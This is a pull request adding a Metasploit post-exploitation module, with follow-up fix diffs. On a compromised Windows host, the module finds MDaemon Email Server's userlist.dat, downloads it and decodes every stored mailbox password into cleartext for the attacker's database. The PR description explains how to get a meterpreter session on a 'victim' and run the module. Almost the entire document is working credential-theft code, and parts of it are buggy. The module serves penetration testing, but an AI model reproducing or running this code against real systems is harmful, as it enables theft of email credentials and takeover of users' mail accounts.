### PR TITLE
New Post Module

### DIFF
--- a/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
+++ b/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
@@ -1,0 +1,321 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'base64'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'          => 'Windows Gather MDaemonEmailServer Credential Cracking',
+        'Description'   => %q{
+          Finds and cracks the stored passwords of MDaemon Email Server.
+        },
+        'References'     =>
+        [
+          ['BID', '4686']
+        ],
+        'License'       => MSF_LICENSE,
+        'Author'        => ['Manuel Nader #AgoraSecurity'],
+        'Platform'      => ['win'],
+        'Arch'          => ['x64','x86'],
+        'SessionTypes'  => ['meterpreter', 'shell']
+    ))
+
+    register_options(
+      [OptString.new('RPATH', [false, 'Path of the MDaemon installation', false]) # If software is installed on a rare directory
+    ], self.class)
+  end
+
+  def run
+    if session.type != 'meterpreter'
+      print_error ('Only meterpreter sessions are supported by this post module')
+      return
+    end
+      progfiles_env = session.sys.config.getenvs('SYSTEMDRIVE', 'HOMEDRIVE', 'ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432')
+      locations = []
+      progfiles_env.each do |_k, v|
+        vprint_status("Searching MDaemon installation at #{v}")
+        if session.fs.dir.entries(name = v).include? 'MDaemon'
+          vprint_status("Found MDaemon installation at #{v}")
+          locations << v + '\\MDaemon\\'
+        end
+        next
+      end
+
+    keys = [
+      'HKLM\\SOFTWARE\\Alt-N Technologies\\MDaemon', # 64 bit. Has AppPath
+      # "HKLM\\SOFTWARE\\Wise Solutions\\WiseUpdate\\Apps\\MDaemon Server" # 32 bit on 64-bit system. Won't find path on register
+    ]
+
+    locations = ['C:\MDaemon\App']
+
+    if datastore['RHOST'].nil?
+      locations << datastore['RHOST']
+    end
+
+    keys.each do |key|
+      begin
+        root_key, base_key = session.sys.registry.splitkey(key)
+        value = session.sys.registry.query_value_direct(root_key, base_key, 'AppPath')
+      rescue Rex::Post::Meterpreter::RequestError => e
+        vprint_error(e.message)
+        next
+      end
+      locations << value.data + '\\'
+    end
+    locations = locations.uniq
+    locations = locations.compact
+    userlist = check_mdaemons(locations)
+    get_mdaemon_creds(userlist) if userlist
+  end
+
+  def crack_password(raw_password)
+    vprint_status("Cracking #{raw_password}")
+    offset = [84, 104, 101, 32, 115, 101, 116, 117, 112, 32, 112, 114, 111, 99, 101]
+    decode = Base64.decode64(raw_password).bytes
+    crack = decode
+    result = ''
+    for i in 0..(crack.size - 1)
+      if (crack[i] - offset[i]) > 0
+        result << (crack[i] - offset[i])
+      else
+        result << ((crack[i] - offset[i]) + 128)
+      end
+    end
+    vprint_status("Password #{result}")
+    return result
+  end
+
+  def check_mdaemons(locations)
+    tmp_filename = (0...12).map { (65 + rand(26)).chr }.join
+    begin
+      locations.each do |location|
+        vprint_status("Checking for Userlist in MDaemons directory at: #{location}")
+        begin
+          session.fs.dir.foreach("#{location}") do |fdir|
+            ['userlist.dat', 'UserList.dat'].each do |datfile|
+              if fdir == datfile
+                filepath = location + '\\' + datfile
+                print_good("Configuration file found: #{filepath}")
+                print_good("Found MDaemons on #{sysinfo['Computer']} via session ID: #{session.sid}")
+                vprint_status("Downloading UserList.dat file to tmp file: #{tmp_filename}")
+                session.fs.file.download_file(tmp_filename, filepath)
+                # userdat = session.fs.file.open(filepath).read.to_s.split(/\n/)
+                return tmp_filename
+              end
+            end
+          end
+        rescue Rex::Post::Meterpreter::RequestError => e
+          vprint_error(e.message)
+        end
+      end
+    rescue ::Exception => e
+      print_error(e.to_s)
+      return
+    end
+
+    return nil
+  end
+
+  def parse_userlist(data)
+    # creds  = ["['domain','mailbox','full_name','mail_dir','password']"]
+    creds = []
+    pop3 = []
+    imap = []
+    users = 0
+    passwords = 0
+    file = File.open(data)
+    file.each do |line|
+      domain = line.slice(0..44).strip!
+      mailbox = line.slice(45..74).strip!
+      full_name = line.slice(75..104).strip!
+      mail_dir = line.slice(105..194).strip!
+      raw_password = line.slice(195..210)
+      password = crack_password(raw_password)
+      access= line.slice(217)
+      users     += 1
+      passwords += 1
+      if access == 'Y' # IMAP & POP3
+        pop3 << [domain, mailbox, full_name, mail_dir, password]
+        imap << [domain, mailbox, full_name, mail_dir, password]
+      elsif access == 'P' # POP3
+        pop3 << [domain, mailbox, full_name, mail_dir, password]
+      elsif access == 'I' # IMAP
+        imap << [domain, mailbox, full_name, mail_dir, password]
+      end
+      # Saves all the passwords
+      creds << [domain, mailbox, full_name, mail_dir, password]
+    end
+    vprint_status('Collected the following credentials:')
+    vprint_status("    Usernames: #{users}")
+    vprint_status("    Passwords: #{passwords}")
+    vprint_status("Deleting tmp file: #{data}")
+    del_cmd = 'rm '
+    del_cmd << data
+    system(del_cmd)
+    return creds, imap, pop3
+  end
+
+  def report_cred(creds)
+    # Build service information
+    service_data = {
+      # address: session.session_host, # Gives internal IP
+      address: session.tunnel_peer.partition(':')[0], # Gives public IP
+      port: 25,
+      service_name: 'smtp',
+      protocol: 'tcp',
+    }
+    # Iterate through credentials
+    creds.each do |cred|
+      # Build credential information
+      credential_data = {
+        origin_type: :service,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        private_type: :password,
+        private_data: cred[4],
+        username: cred[1],
+        workspace_id: myworkspace_id,
+        module_fullname: self.fullname
+      }
+      print_status("Debug 1: #{credential_data}")
+      credential_data.merge!(service_data)
+      print_status("Debug 2: #{credential_data}")
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        workspace_id: myworkspace_id
+      }
+
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+
+      print_status ("    Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}")
+    end
+
+    # report the goods!
+    loot_path = store_loot('MDaemon.smtp_server.creds', 'text/csv', session, creds.to_csv,
+      'mdaemon_smtp_server_credentials.csv', 'MDaemon SMTP Users Credentials')
+    print_status("SMPT credentials saved in: #{loot_path}")
+  end
+
+  def report_pop3(pop3)
+    # Build service information
+    service_data = {
+      # address: session.session_host, # Gives internal IP
+      address: session.tunnel_peer.partition(':')[0], # Gives public IP
+      port: 110,
+      service_name: 'pop3',
+      protocol: 'tcp',
+    }
+    # Iterate through credentials
+    pop3.each do |cred|
+      # Build credential information
+      credential_data = {
+        origin_type: :service,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        private_type: :password,
+        private_data: cred[4],
+        username: cred[1],
+        workspace_id: myworkspace_id,
+        module_fullname: self.fullname
+      }
+      vprint_status("Debug 1: #{credential_data}")
+      credential_data.merge!(service_data)
+      vprint_status("Debug 2: #{credential_data}")
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        workspace_id: myworkspace_id
+      }
+
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+
+      print_status ("    Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}")
+    end
+
+    # report the goods!
+    loot_path = store_loot('MDaemon.pop3_server.creds', 'text/csv', session, creds.to_csv,
+      'mdaemon_pop3_server_credentials.csv', 'MDaemon POP3 Users Credentials')
+    print_status("POP3 credentials saved in: #{loot_path}")
+  end
+
+  def report_imap(imap)
+    # Build service information
+    service_data = {
+      # address: session.session_host, # Gives internal IP
+      address: session.tunnel_peer.partition(':')[0], # Gives public IP
+      port: 143,
+      service_name: 'imap',
+      protocol: 'tcp',
+    }
+    # Iterate through credentials
+    imap.each do |cred|
+      # Build credential information
+      credential_data = {
+        origin_type: :service,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        private_type: :password,
+        private_data: cred[4],
+        username: cred[1],
+        workspace_id: myworkspace_id,
+        module_fullname: self.fullname
+      }
+      vprint_status("Debug 1: #{credential_data}")
+      credential_data.merge!(service_data)
+      vprint_status("Debug 2: #{credential_data}")
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        workspace_id: myworkspace_id
+      }
+
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+
+      print_status ("    Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}")
+    end
+
+    # report the goods!
+    loot_path = store_loot('MDaemon.imap_server.creds', 'text/csv', session, creds.to_csv,
+      'mdaemon_imap_server_credentials.csv', 'MDaemon SMTP Users Credentials')
+    print_status("IMAP credentials saved in: #{loot_path}")
+  end
+
+  def get_mdaemon_creds(userlist)
+    credentials = Rex::Ui::Text::Table.new(
+      'Header'    => 'MDaemon Email Server Credentials',
+      'Indent'    => 1,
+      'Columns'   =>
+      [
+        'Domain',
+        'Mailbox',
+        'Full Name',
+        'Mail Dir',
+        'Password'
+      ])
+    creds, imap, pop3 = parse_userlist(userlist)
+    report_cred(creds)
+    report_pop3(pop3)
+    report_imap(imap)
+
+  end
+end

--- a/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
+++ b/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
@@ -99,8 +99,8 @@ class MetasploitModule < Msf::Post
         vprint_status("Checking for Userlist in MDaemons directory at: #{location}")
         begin
           session.fs.dir.foreach("#{location}") do |fdir|
-            ['userlist.dat', 'UserList.dat'].each do |datfile|
-              if fdir == datfile
+            ['userlist.dat'].each do |datfile|
+              if fdir.downcase == datfile.downcase
                 filepath = location + '\\' + datfile
                 print_good("Configuration file found: #{filepath}")
                 print_good("Found MDaemons on #{sysinfo['Computer']} via session ID: #{session.sid}")

--- a/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
+++ b/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb
@@ -159,7 +159,8 @@ class MetasploitModule < Msf::Post
     del_cmd = 'rm '
     del_cmd << data
     system(del_cmd)
-    return creds, imap, pop3
+    result = [creds, imap, pop3]
+    return result
   end
 
   def report_cred(creds)
@@ -170,30 +171,28 @@ class MetasploitModule < Msf::Post
       port: 25,
       service_name: 'smtp',
       protocol: 'tcp',
+      workspace_id: myworkspace_id
     }
     # Iterate through credentials
     creds.each do |cred|
       # Build credential information
       credential_data = {
-        origin_type: :service,
+        origin_type: :session,
         session_id: session_db_id,
         post_reference_name: self.refname,
         private_type: :password,
         private_data: cred[4],
         username: cred[1],
-        workspace_id: myworkspace_id,
         module_fullname: self.fullname
       }
-      print_status("Debug 1: #{credential_data}")
       credential_data.merge!(service_data)
-      print_status("Debug 2: #{credential_data}")
       credential_core = create_credential(credential_data)
 
       # Assemble the options hash for creating the Metasploit::Credential::Login object
       login_data = {
         core: credential_core,
         status: Metasploit::Model::Login::Status::UNTRIED,
-        workspace_id: myworkspace_id
+        # workspace_id: myworkspace_id
       }
 
       login_data.merge!(service_data)
@@ -208,7 +207,7 @@ class MetasploitModule < Msf::Post
     print_status("SMPT credentials saved in: #{loot_path}")
   end
 
-  def report_pop3(pop3)
+  def report_pop3(creds)
     # Build service information
     service_data = {
       # address: session.session_host, # Gives internal IP
@@ -216,30 +215,28 @@ class MetasploitModule < Msf::Post
       port: 110,
       service_name: 'pop3',
       protocol: 'tcp',
+      workspace_id: myworkspace_id
     }
     # Iterate through credentials
-    pop3.each do |cred|
+    creds.each do |cred|
       # Build credential information
       credential_data = {
-        origin_type: :service,
+        origin_type: :session,
         session_id: session_db_id,
         post_reference_name: self.refname,
         private_type: :password,
         private_data: cred[4],
         username: cred[1],
-        workspace_id: myworkspace_id,
         module_fullname: self.fullname
       }
-      vprint_status("Debug 1: #{credential_data}")
       credential_data.merge!(service_data)
-      vprint_status("Debug 2: #{credential_data}")
       credential_core = create_credential(credential_data)
 
       # Assemble the options hash for creating the Metasploit::Credential::Login object
       login_data = {
         core: credential_core,
         status: Metasploit::Model::Login::Status::UNTRIED,
-        workspace_id: myworkspace_id
+        # workspace_id: myworkspace_id
       }
 
       login_data.merge!(service_data)
@@ -254,7 +251,7 @@ class MetasploitModule < Msf::Post
     print_status("POP3 credentials saved in: #{loot_path}")
   end
 
-  def report_imap(imap)
+  def report_imap(creds)
     # Build service information
     service_data = {
       # address: session.session_host, # Gives internal IP
@@ -262,23 +259,21 @@ class MetasploitModule < Msf::Post
       port: 143,
       service_name: 'imap',
       protocol: 'tcp',
+      workspace_id: myworkspace_id
     }
     # Iterate through credentials
-    imap.each do |cred|
+    creds.each do |cred|
       # Build credential information
       credential_data = {
-        origin_type: :service,
+        origin_type: :session,
         session_id: session_db_id,
         post_reference_name: self.refname,
         private_type: :password,
         private_data: cred[4],
         username: cred[1],
-        workspace_id: myworkspace_id,
         module_fullname: self.fullname
       }
-      vprint_status("Debug 1: #{credential_data}")
       credential_data.merge!(service_data)
-      vprint_status("Debug 2: #{credential_data}")
       credential_core = create_credential(credential_data)
 
       # Assemble the options hash for creating the Metasploit::Credential::Login object
@@ -312,10 +307,9 @@ class MetasploitModule < Msf::Post
         'Mail Dir',
         'Password'
       ])
-    creds, imap, pop3 = parse_userlist(userlist)
-    report_cred(creds)
-    report_pop3(pop3)
-    report_imap(imap)
-
+    result = parse_userlist(userlist)
+    report_cred(result[0])
+    report_pop3(result[1])
+    report_imap(result[2])
   end
 end


### PR DESCRIPTION
The category of the module is: post/windows/gather/credentials/
**Explanation**
It retrieves the users and crack the password of MDaemon Email Server.
Does some techniques to find the file (userlist.dat), then proceed to read it and crack it.
At the end saves the results in the DB.

It's been tested on:
AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro  @ July 2016 x64 bits with meterpreter of 32 and 64 bits. Both work but 32 bits couldn't find the path through Register.

**NOTE**: It has bug at the moment it saves the credentials to the database. I would appreciate some help to fix that.

Instructions on how to setup the vulnerable environment:
1.- Download and Install: http://www.altn.com/Downloads/MDaemon-Mail-Server-Free-Trial/
Note: You require a valid licence, but there's a demo for 30 days.
2.- Get a meterpreter running on the victim machine.
3.- Execute the module.

Extra:
1. No SYSTEM access is requiered.
2. If the machine runs on 64bits and the meterpreter is 32 bits, it won't be able to find the installation path in the registry, but it will search some default paths. If it is installed on a non-default path you can give the RPATH and it will work.
